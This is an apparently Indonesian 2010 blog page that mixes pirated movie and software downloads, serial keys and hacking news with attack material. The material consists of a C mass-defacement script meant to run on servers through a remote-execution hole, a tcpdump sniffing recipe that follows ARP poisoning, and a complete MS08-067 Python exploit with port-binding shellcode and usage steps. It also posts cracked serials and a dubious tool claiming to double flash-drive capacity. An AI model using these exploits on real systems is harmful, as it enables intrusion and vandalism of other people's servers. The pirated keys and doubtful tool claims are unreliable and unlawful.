Selasa, 27 April 2010

Tools Mengubah Ukuran FD dari 1 GB menjadi 2 GB

Langsung aja deh....
Neeh caranya.....

1. Format Flashdisk menjadi FAT.... Jangan sampai salah.......
2. Run softwarenya.....
3. Pilih lokasi drive Flashdisk..........
4. Klik Fix............
5. Klik ok..........
6. Klik ok lagi............
7. Klik ok, cabut FD lalu colokin lagi..........
8. Jadi deh 2 Gb..............

Nb : Harus 1 GB...........
Download Tools

Minggu, 25 April 2010

TRIAGE

Starring : Colin Farrell,Jamie Sives,Paz Vega,Kelly ReillyBranko Djuric,Mozaffar Shafeie

Zoolander

Starring : Ben Stiller,Owen Wilson,Christine Taylor,Will Ferrell,Milla Jovovich,Jerry Stiller

Download

JEJAK DARAH

Starring : Dimas Aditya,Ayu Diana,Thalita Latief,Mentari,Nabilla
Genre : Horror

Download

Rabu, 21 April 2010

Hacker, membuat dunia maya lebih berwarna


Terminologi hacker sering menimbulkan ketakutan, tapi juga rasa ingin tahu, bahkan obsesi bagi generasi muda untuk menunjukkan eksistensi diri. Jadi apa atau siapa sih hacker itu sebenarnya?
Hacker adalah seseorang memiliki pengetahuan mendalam terhadap cara kerja internal suatu sistem komputer atau jaringan computer (RFC 1392). Masih ada kontraversi seputar arti dari hacker, apakah hacker itu indentik dengan tindakan kriminal atau justru bagian penting dari pengamanan komputer.
Aktifitas hacker dalam konotasi negatif yang tercatat adalah ketika sekelompok orang merusak sistem telepon di amerika pada tahun 1963, kemudian kasus lain yang cukup populer ketika pada tahun 1999 David Smith meluncurkan virus Melissa dan menular pada sekitar 1,2 juta komputer dan mengakibatkan kerugian sekitar 80 juta US dolar.
David Smith ditangkap dan didakwa atas tuduhan criminal computer hacking dan divonis 40 tahun penjara. Namun ia dibebaskan setelah 20 bulan setelah menyetujui untuk memberikan bantuan pada dinas rahasia Amerika FBI dalam pengawasan aktifitas bawah tanah di dunia maya.
Jadi apakah seorang hacker atau cracker itu selalu berkonotasi negatif? Diluar pengertian hacker sebagai seorang yang berprofesi di dunia kemanan sistem komputer, barangkali harus diakui bahwa hacker adalah seseorang yang memiliki kecenderungan melanggar otoritas sistem, menyembunyikan identitas, menyerahkan tanggung jawab pada pengguna dan merugikan pihak tertentu (biasanya pengembang software atau Admin sebuah system jaringan). Akan tetapi juga merupakan sebuah realitas bahwa para hacker tersebut telah memberikan banyak solusi serta memberi kontribusi yang berarti pada optimalisasi teknologi bagi kehidupan. Jadi sebuah dilema apakah para aktifitas hacker itu menganggu keseimbangan atau justru menimbulkan keseimbangan baru.
Saat ini telah banyak karya-karya para hacker yang dinikmati pemakai komputer seperti bocoran serial number perangkat-perangkat lunak proprietary. Tools-tools pengambil kontent internet seperti lagu, video dll, bahkan tips-trik dan file terkompilasi untuk melakukan perubahan konfigurasi sistem guna mengembangkan, menambah fitur atau kemampuan sebauah perangkat lunak.
Jadi berterimakasih lah terhadap para hacker tersebut (berikan donasi ), dan jika anda ingin atau telah menjadi hacker jadilah yang hacker yang menjunjung etika.

Hacker RI Incar Bank Internasional

Jakarta - Jumlah cyber crime atau kejahatan dunia maya di Indonesia tertinggi di dunia. Hacker Indonesia sering kali mengincar bank-bank internasional untuk dibobol.
"Kasus cyber crime di Indonesia adalah nomor satu di dunia," kata Brigjen Anton Taba, Staf Ahli Kapolri, dalam acara peluncuran buku Panduan Bantuan Hukum Indonesia (PBHI) di Jakarta. Brigjen Anton Taba memaparkan, tingginya kasus cyber crime dapat dilihat dari banyaknya kasus pemalsuan kartu kredit dan pembobolan sejumlah bank. Menurut dia, hacker lebih sering dalam membobol bank-bank internasional dibandingkan dengan bank-bank dalam negeri. Setelah Indonesia, ujar Anton, negara lainnya yang memiliki jumlah kasus cyber crime tertinggi adalah Uzbekistan.

Karena tingginya kasus cyber crime, ia mengkritik buku PBHI yang tidak memiliki bagian khusus yang membahas tentang hal tersebut.
 
Buku PBHI pada 2009 adalah edisi yang kedua, setelah edisi perdana terbit pada 2006.
Ke-15 bab dalam buku tersebut berisi tema yaitu Hukum di Indonesia; Sistem Hukum di Indonesia; Bantuan Hukum di Indonesia; Pengaduan; Hukum Keluarga, Perempuan, dan Anak; Perjanjian Kredit; Hukum Tanah; Hukum Perburuhan; Hukum Lingkungan; Hak Individu dalam Hukum Pidana; Hak Konsumen; Pelanggaran HAM Berat dan Hak Korban; HAM dalam Konstitusi; Pemerintahan dan Kelembagaan Negara; serta Advokasi.

7 Cyber crime terbesar di dunia


Kejahatan di dunia maya (cyber crime) sekarang berada di urutan kedua setelah kejahatan narkoba, baik dilihat dari nilai keuntungan materi yang diperolehnya, maupun kerugian dan kerusakan bagi para korbannya. Meskipun beritanya sudah berulangkali disiarkan oleh media, tampaknya ketiadaan kesadaran publik menjadi keuntungan bagi pihak pencuri-pencuri itu, dan hal ini dibuktikan oleh fakta bahwa banyak orang masih bisa dicuri hanya dengan trik-trik online yang sederhana. Sebagian situs menggiring anda melalui suatu lika-liku implementasi digital paling berbahaya di dunia, maka berhati-hatilah dengan kegiatan online anda.
Berikut ini adalah 7 besar kriminal-kriminal di dunia maya, meskipun nama-nama mereka adalah samaran, tapi mereka nyata adanya.


1. Kodiak
Tahun 1994, Kodiak mengakses rekening dari beberapa pelanggan perusahaan besar pada bank utama dan mentransfer dana ke rekening yang telah disiapkan oleh kaki tangan mereka di Finlandia, Amerika Serikat, Jerman, Israel dan Inggris. Dalam tahun 2005, dia dijatuhi hukuman dan dipenjara selama tiga tahun. Diperkirakan Kodiak telah mencuri sebesar 10,7 juta dollar.
2. Don Fanucci
Di usia 15 tahun, Don Fanucci melakukan suatu rangkaian serangan pada bulan Februari 2000 terhadap beberapa situs web komersil ber-traffick tinggi. Dia dihukum tahanan kota di tempat tinggalnya, Montreal, Quebec, pada 12 September 2001 selama delapan bulan dengan penjagaan terbuka, satu tahun masa percobaan, pembatasan pemakaian Internet, dan denda. Kerusakan ekonomi secara global sebagai akibat serangan-serangannya itu diyakini mencapai 7,5 juta hingga 1,2 milyar dollar.
3. Pox
Salah satu pencipta virus e-mail “Love Bug” (iloveyou), Pox, diduga telah menginfeksi dan melumpuhkan lebih dari 50 juta komputer dan jaringan pada 4 Mei 2000. Virus tersebut juga menyerang komputer-komputer milik Pentagon, CIA dan organisasi-organisasi besar lainnya dan menyebabkan kerugian berjuta-juta dolar akibat kerusakan-kerusakan. Karena Pilipina tidak mempunyai undang-undang yang melawan kejahatan hacking komputer, Fox tidak pernah didakwa atas kejahatan-kejahatannya.
4. Mishkal
Mishkal dituduh sebagai salah satu godfather pemalsu kartu kredit di Eropa Timur. Dia dan rekanan-rekanannya dituduh memproduksi secara masal kartu kredit dan debet palsu. Pada satu titik, mereka dilaporkan memiliki pendapatan hingga 100.000 dollar per hari. Dia ditangkap namun kemudian dibebaskan setelah enam bulan ditahan, dan dengan segera dicarikan kedudukan di pemerintahan Ukrainia – sebuah posisi yang akan memberikan kepadanya kekebalan otomatis dari penuntutan lebih lanjut.
5. The Wiz dan Piotrek
The Wiz, 23 tahun, dan Piotrek, 27 tahun, dari Chelyabinsk, Rusia, dihukum untuk sejumlah tuntutan perkomplotan, berbagai kejahatan komputer, dan penipuan mengikat melawan lembaga-lembaga keuangan di Seattle, Los Angeles dan Texas. Di antaranya, mereka mencuri database dari sekitar 50.000 kartu kredit. Keduanya didenda dan dihukum sedikitnya tiga tahun penjara.
6. Roper, Red_Skwyre, dan Dragov
Tiga orang ini adalah inti dari jaringan kejahatan dunia maya dengan memeras uang dari bank-bank, Kasino-kasino internet, dan berbagai bisnis berbasis web lainnya. Strategi mereka sederhana, yakni meng-hack dan menahan proses transaksi rekening untuk sebuah tebusan sebesar 40.000 dollar. Didakwa menyebabkan kerusakan langsung lebih dari 2 juta poundstarling dan kerusakan-kerusakan tidak langsung sekitar 40 juta poundstarling. Dalam bulan Oktober 2007, trio itu dinyatakan bersalah dan dijatuhi hukuman delapan tahun penjara.
7. Bandit
Bandit memanipulasi kira-kira 500.000 komputer dan menyewakannya untuk aktivitas kejahatan. Dia ditangkap pada bulan November 2005 dalam sebuah operasi FBI, dan dihukum 60 bulan penjara, dan diperintahkan untuk menyerahkan sebuah mobil mewahnya seharga 58.000 dollar yang berasal dari hasil kejahatannya. Dia juga diperintahkan untuk membayar 15.000 dollar sebagai ganti rugi kepada pemerintah Amerika Serikat untuk komputer-komputer militer yang terinfeksi.

Nama FBI Picu Kenaikan Cyber Crime

FBI selalu berteriak mengenai ancaman kejahatan internet yang makin marak di dunia maya. Namun lucunya, nama FBI malah membuat cyber crime meningkat 20 persen.

WASHINGTON - FBI selalu berteriak mengenai ancaman kejahatan internet yang makin marak di dunia maya. Namun lucunya, nama FBI malah membuat cyber crime meningkat 20 persen.
Sebuah laporan yang dikeluarkan Internet Crime Complaint Center menemukan bahwa, korban kejahatan di dunia maya yang menggunakan scam melonjak menjadi 20 persen.
Sebagian besar dari pengguna yang terjebak tersebut mendapatkan email palsu. Mereka terperangkap karena merasa yakin, setelah dalam pesan elektronik tersebut selalu menyebutkan nama FBI.
Kasus ini sendiri sudah mencapai angka 16 persen dari 300.000 lebih keluhan yang masuk tahun lalu. Demikian yang dilansir melalui PC World, Rabu (17/3/2010).
Para korban scam ini mengatakan, mereka mendapat email yang mengatasnamakan Direktur Robert Mueller dari FBI, yang meminta dikirimkan sejumlah uang. Bahkan, kasus pencatutan nama ini telah menyebabkan kerugian hingga USD100 ribu.
Untuk itulah, juru bicara FBI menegaskan agar pengguna internet tidak terbujuk oleh email yang mengaku-ngaku tersebut. Apalagi sebelumnya, nama Presiden AS Obama juga pernah dicatut untuk aksi yang serupa.

Deface Tools

Download

Scan LFI, RFI, PD Online Tools [UPDATE]


BLACK WATER

Starring : Diana Glenn,Maeve Dermody,Andy Rodoreda,Ben Oxenbould,Fiona Press
Genre : Adventure | Drama | Horror

Download

DEATH BELL

Starring : In-sook Choi,Da-Geon,Sung Jin,Yi-seul Kang,Bum Kim,So-hie Kim
Genre : Horror | Thriller

Download

avast! Antivirus Pro 5.0.507 Final + Serial

Download

Nero Multimedia Suite v10.0.13100 + Serial

Download
Serial : 9X03-016C-MXEX-4536-T0L7-2W2T-AMPX-97TA

CASHBACK

Starring : Sean Biggerstaff,Emilia Fox,Shaun Evans,Michelle Ryan,Stuart Goodwin,Michael Dixon
Genre : Comedy | Drama | Romance

Download

PAUL BLART MALL COP

Starring : Kevin James,Keir O’Donnell,Jayma Mays,Raini Rodriguez,Shirley Knight
Genre : Action | Comedy | Crime

Download

Avira Premium Security Suite 10.0.0.540

Download

Avira AntiVir Premium 10.0.0.601

Download

Avira AntiVir Personal 10.0.0.565 – FREE Antivirus

Download

THIR13EN GHOST

Starring : Tony Shalhoub,Embeth Davidtz,Matthew Lillard,Shannon Elizabeth,Alec Roberts
Genre : Horror | Mystery

Download

Messenger Plus! Live 4.84.382

Download

Norton AntiVirus 2010

Download

The Exorcist

Starring : Ellen Burstyn,Max von Sydow,Lee J. Cobb,Kitty Winn,Jack MacGowran,Linda Blair
Genre : Drama | Horror

Download

NINE DEAD (2010)

Starring : Melissa Joan Hart,William Lee Scott,John Terry,James C. Victor,Lucille Soong
Genre : Crime | Mystery

Download
Password : www.3lanet.com

Adobe Reader 9.3.2

Download

Webcam 7 Pro v.0.9.9.21b Multilang

Download

LICENSE KEY KASPERSKY UPDATE 14.04.2010

Download

CLASH OF THE TITANS

Starring : Sam Worthington,Liam Neeson,Ralph Fiennes,Jason Flemyng,Gemma Arterton,Alexa Davalos
Genre : Action | Adventure

Download
Password : mediafiremoviez.com

CYBORG SHE

Starring : Haruka Ayase,Keisuke Koide,Risa Ai,Yoshikazu Ebisu,Ken’ichi Endô
Genre : Action | Comedy | Romance

Download

Wedding Crashers

Starring : Vince Vaughn,Owen Wilson,Christopher Walken,Rachel McAdams,Isla Fisher,Jane Seymour
Genre : Comedy | Romance

Download

COP OUT (2010)

Starring : Bruce Willis,Tracy Morgan,Juan Carlos Hernández,Cory Fernandez,Ana de la Reguera
Genre : Action | Comedy | Crime

Download

Password : mediafiremoviez.com

The Notebook

Starring : Ryan Gosling,Tim Ivey,Rachel McAdams,Starletta DuPois,James Garner,Joan Allen
Genre : Drama | Romance

Download

GWOEMUL : A.k.a THE HOST

Starring : Kang-ho Song,Hie-bong Byeon,Hae-il Park,Ah-sung Ko
Genre : Comedy | Drama | Fantasy | Horror

Download

MY GIRL AND I

Starring : Tae-hyun Cha,Hae-suk Kim,Yun-seok Kim,Jung-Hee Moon,Chang-ui Song
Genre : Romance

Download
Subtitle Indonesia Include

Ubuntu 10.04 LTS (Lucid Lynx) Beta 2

Download

avast! Antivirus 5.0.499 Free

Download

Google Chrome 5.0.375.3 Dev

Download

ClamWin Free Antivirus 0.96

Download

Microsoft NET Framework 4.0 Final

Framework is a software component which can be added to the Microsoft Windows operating system. It provides a large body of pre-coded solutions to common program requirements, and manages the execution of programs written specifically for the framework

Download

Mirna

MOVIES
Starring : Dewi Persik, Julia Perez, Dinda Kanya Dewi, Hessel Steven
Genre : Horror

Download

Windows 7 Manager 1.2.1 + Serial

Tweak and Optimize your Windows 7

Download

Jumat, 09 April 2010

mass deface no root?!

MASS DEFACE TANPA ROOTING WHY NOT??

Skrip deface masal tanpa harus rooting (misal pake user nobody)
Copyright By Ph03n1X @ 2005
You may use 'n edited this script of course for education
Commercial use is prohibited


Simpan skrip berikut sebagai file C kemudian dowload ke site yang punya hole remote ekskusi ekskusi skrip ini di server yang punya hole itu...

----------------------------massnoroot.c----------------------------------

/*
Mass Deface script without rooting
Write By Ph03n1X king_purba@yahoo.co.uk
http://student.te.ugm.ac.id/~phoenix03/tutorial
*/

#include "stdio.h"
#include "stdlib.h"

FILE *ax;
char abc[256],bcd[300];

main()
{

/*
Assumsi bahwa semua DocumentRoot virtual domain apache
berada di bawah folder /usr/student/resarch
Untuk mengetahui dimana DocumentRoot silakan cari
di httpd.conf
*/

system("find /usr/student/resarch -perm 777 -type d > folder.txt");
if((ax=fopen("folder.txt","r"))==NULL)
{
printf("Sorry cannot open file folder.txt\n");exit(0);
}
while(fgets(abc,sizeof(abc),ax))
{
abc[strlen(abc)-1]='\0';
sprintf(bcd,"echo Sorry Hack By king_purba@yahoo.co.uk > %s/deface.txt",abc);
system(bcd);
}
system("find /usr/student/resarch -name deface.txt > result.txt");
printf("\nFile yang tercipta dapat anda lihat di file result.txt\n");
printf("Kalo file result kosong berarti usernya jago-jago atau anda udah di chroot :D\n\n");
}

---------------------------EOF-massnoroot.c----------------------------------

Sniff it using TCPDUMP & read it with WIRESHARK

Caranya mudah saja :

1. Sniffing dgn TCPDUMP di Mesin hasil ROOTING, stelah sebelumnya ARP Poisoning dijalankan antara Server Target dan Gateway.

# tcpdump -i eth0 -w dump.log

2. Download file hasil TCPDUMP ke Local Kompi yg sdh diinstall WIRESHARK

3. Buka file hasil TCPDUMP di WIRESHARK

Pada Wireshark buka menu OPEN, lalu cari lokasi file hasil tcpdump yg sebelumnya telah di download, lalu sperti biasa klik kanan pada salah satu baris sesi komunikasi TCP dan pilih FOLLOW TCP STREAM.

[metasploit] ms08_067_netapi PoC >> win!@#s xp sp2

Code:#!/usr/bin/env python
#############################################################################
#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
#   www.hackingspirits.com
#   www.coffeeandsecurity.com
#   Email: d3basis.m0hanty @ gmail.com
#############################################################################

import struct
import sys

from threading import Thread    #Thread is imported incase you would like to modify
                                #the src to run against multiple targets.

try:
    from impacket import smb
    from impacket import uuid
    from impacket.dcerpc import dcerpc
    from impacket.dcerpc import transport
except ImportError, _:
    print 'Install the following library to make this script work'
    print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
    print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
    sys.exit(1)


print '#######################################################################'
print '#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '#   www.hackingspirits.com'
print '#   www.coffeeandsecurity.com'
print '#   Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'


#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"


#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'

#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'


if sys.argv[2]=='1':    #Windows 2000 Payload
    payload=payload_1
    print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2':    #Windows 2003[SP2] Payload
    payload=payload_2
    print '[-]Windows 2003[SP2] payload loaded'


class SRVSVC_Exploit(Thread):
    def __init__(self, target, osver, port=445):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target
        self.osver   = osver

    def __DCEPacket(self):
        print '[-]Initiating connection'
        self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
       
        # Constructing Malicious Packet
        self.__stub='\x01\x00\x00\x00'
        self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub+=shellcode
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        self.__stub+=payload
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub+='\x01\x00\x00\x00'
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)   #0x1f (or 31)- NetPathCanonicalize Operation
        print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'

if __name__ == '__main__':
       try:
               target = sys.argv[1]
               osver = sys.argv[2]
       except IndexError:
               print '\nUsage: %s \n' % sys.argv[0]
               print 'Example: srvsvcexpl.py 192.168.1.1 2\n'
               print 'Select OS Version'
               print '[-]Windows 2000: OS Version = 1'
               print '[-]Windows 2003[SP2]: OS Version = 2'

               sys.exit(-1)

current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'


============================================================

1. Pastikan port 139 dan 445 pada mesin target dalam kondisi terbuka (open), bisa menggunakan NMAP :
#nmap -p 139,445
2. Untuk memastikan Vulner ms08_067_netapi terdapat pada mesin target bisa menggunakan tool ini : 

Here
or
Here
3. Lalu silahkan gunakan Metasploit....

Mozilla Firefox 3.7 Alpha 4

Download

Adobe Flash Player 10.1.53.7 RC

Download 

HACHIKO : A DOG STORY

Starring : Richard Gere,Sarah Roemer,Joan Allen,Robert Capron,Jason Alexander,Davenia McFadden
Genre : Drama | Family
Quality : DVDRip

Download

Russian Hackers Jam Automobile Traffic with Porn

 Traffic jerked to a standstill as rubbernecking motorists ogled a pornographic clip posted by hackers on big-screen video billboards in Moscow, Russian news agencies reported Friday.

Traffic jerked to a standstill as rubbernecking motorists ogled a pornographic clip posted by hackers on big-screen video billboards in Moscow, Russian news agencies reported Friday.

The company that operates the billboards, Panno.ru, said hackers were behind a graphic sex video broadcast late Thursday night on two roadside screens along Moscow's Garden Ring Road, one of the city's busiest arteries.

"This was an attack by hackers on the computers, as a result of which one of the commercial video clips was swapped for an indecent video," Panno.ru commercial director Viktor Laptev told RIA-Novosti.

He speculated the attack could have been linked to competition on the advertising market, or simply "hooliganism."

Witnesses said traffic crawled to a halt as unbelieving motorists craned their necks to stare at the X-rated clip, which ran for about 20 minutes on the oversized screens.

"Within three minutes we found it out, and within fifteen minutes the screen was shut off," the deputy head of the Moscow city advertising committee, Alexander Menchuk, was quoted as saying by Interfax.

Iran vs. China in Cyber War


Chinese hackers incapacitate Iranian government websites in retaliation for Iranian attacks.

Several Iranian state websites have been taken down by Chinese hackers in retaliation for Iranian attacks on China’s biggest search engine.

The websites of Iran’s supreme leader and president along with those of the ministries of defense and foreign affairs were all brought down by Chinese hackers, referring to themselves as the Honker Union, in revenge for an attack on China’s Baidu site earlier this week.

An Iranian group, the Iranian Cyber Army, claimed responsibility for the sabotage of Baidu in response to Chinese web users’ support for Iran’s opposition movement.

“The solidarity and support for the people in Iran has been limited to statements,” Iranian opposition blogger Potkin Azarmehr told The Media Line. “But this is the first cyberspace help from outside Iran on behalf of those who support the green movement.”

“It’s just more evidence to show how important cyberspace is to what’s going on in Iran,” he said. “This is probably the first revolution where it’s not just a struggle on the streets but also across cyberspace.”

“It’s a cat and mouse game,” Azarmehr said. “Sometimes the pro-green [opposition] people have the upper hand and sometimes the government has the upper hand.”

Azarmehr said Iran’s reformist movement had received positive support from Chinese netcitizens.

“When we talk about censorship… or when we write about the Chinese government’s support of [Iranian President Mahmoud] Ahmadinejad and the administration,” he said, “we have Chinese supporters who express sympathy.”

Azarmehr also referred to the Chinese Falun Gong’s support of their Iranian counterparts by sharing their program for circumventing official website filtering systems.

Kourosh Ziabari, another Iranian blogger, echoed Azarmehr’s sentiments.

“Interaction between people on both sides is building up,” he told The Media Line. “It has happened a number of times that people from China have left comments [on my blog] expressing their ideas on what we write.”

Rabu, 07 April 2010

Hacker Kembali Bidik Pengguna IE6 dan 7

SAN FRANCISCO - Microsoft kembali mengingatkan pengguna browser internet Explorer 6 dan Explorer 7 terkait serangan hacker ke browser tersebut. Baru-baru ini Microsoft menyatakan hacker menemukan lubang di kedua versi browser yang dapat menjadi celah serangan.

Namun, raksasa software itu kembali menegaskan celah keamanan tersebut tak terdapat pada IE versi 5 dan IE versi 8.

"Saat ini kami menemukan bahwa sejumlah hacker telah menggunakan kelemahan ini sebagai target serangan," tulis Microsoft dalam keterangannya. Demikian dilansir AsiaOne, Rabu (10/3/2010).

"Kami akan terus mengawasi dan mengupdate setiap informasi terkait hal ini," tandas Microsoft.

Sebelumnya, Microsoft juga mengungkapkan adanya bug baru pengacau komputer yang dapat menginfeksi internet explorer milik pengguna. Cara kerja virus tersebut bersembunyi di balik kinerja Microsoft VBScript dengan Windows Help Files di Internet Explorer. Namun, sebelum melanjutkan 'pengerusakan', virus tersebut akan bekerja setelah pemilik komputer menekan tombol F1.

Tipe serangan virus ini dianggap cukup sulit untuk dijalankan karena membutuhkan kesadaran pengguna untuk menekan tombol F1. Namun serangan berbasis web telah menjadi sumber yang cukup besar untuk menghancurkan jaringan komputer, berkat bantuan software berbahaya. (srn)

Pemimpin kelompok Hacker wanita di China

Komunitas hacker China memanglah sangat banyak, Melebihi 4 juta hacker yang telah menjadi anggota. Salah satu komunitas yang menonjol karena tergolong komunitas hacker Unix, lain dari pada yang biasanya adalah kelompok hacker khusus wanita yang menamakan diri Cn Girl Security Team.


Kelompok hacker ini dipimpin oleh Xiao Tian gadis kelahiran Hunan, 6 September 1989 bernama. Xiao Tian, pemimpin kelompok hacker khusus wanitaTipikal dengan paras ayu nya tidak menggambarkan bahwa ia adalah pemimpin komunitas hacker. Namun ini faktanya lebih dari 2000 hacker wanita yang tergabung dalam komunitas Cn Girl Security Team. Papar nya ia hoby begadang dan sesekali merokok untuk menemaninya beraksi di depan komputer.
 

Contoh hasil karya hacker China

China 'Pancing' Perang Dunia Cyber

NEW YORK - China dinilai terus memancing terjadinya perang cyber, terutama dengan negara-negara barat seperti Amerika Serikat dan negara-negara di Eropa. Sepanjang tahun 2009 tingkat serangan terus mengalami peningkatan bahkan mencapai 1,6 miliar serangan per bulan ke sistem-sistem sentral milik AS.

Uni Eropa dan NATO mengingatkan agar setiap negara anggotanya memperkuat keamanan sistem jaringannya, terutama memperketat keamanan untuk data-data intelijen.

Seorang sumber Times dari NATO, Rabu (10/3/2010), mengatakan China telah menjadi negara paling aktif untuk urusan serangan cyber, terutama sejak 12 bulan terakhir.

"Kami secara reguler telah mengingatkan sejumlah negara untuk memperkuat keamanan internalnya," kata sumber tersebut.

Sasaran utama para penyerang dari China adalah sistem jaringan institusi pemerintahan dan Militer AS. China dinilai punya kepentingan untuk menyerang AS terutama untuk mengumpulkan data-data rahasia intelijen. Inggris sendiri telah membentuk pasukan khusus untuk menghalau setiap serangan di dunia maya, kemungkinan tim tersebut akan beroperasi mulai Maret 2010.

Inggris sengaja membentuk tim khusus, mengingat kedua negara tersebut sering berbagi informasi intelijen sehingga kemungkinan menjadi target serangan. Jonathan Evans, Director-General of MI5 mengatakan, sejumlah negara pernah mendapatkan serangan pada tahun 2007. Namun ia tak menyebutkan secara rinci negaa mana saja yang mendapatkan serangan. Tapi disinyalir serangan tersebut berasal dari China. (srn)

Senin, 05 April 2010

LICENSE KEY KASPERSKY

Download

Kaspersky PURE 9.0.0.192

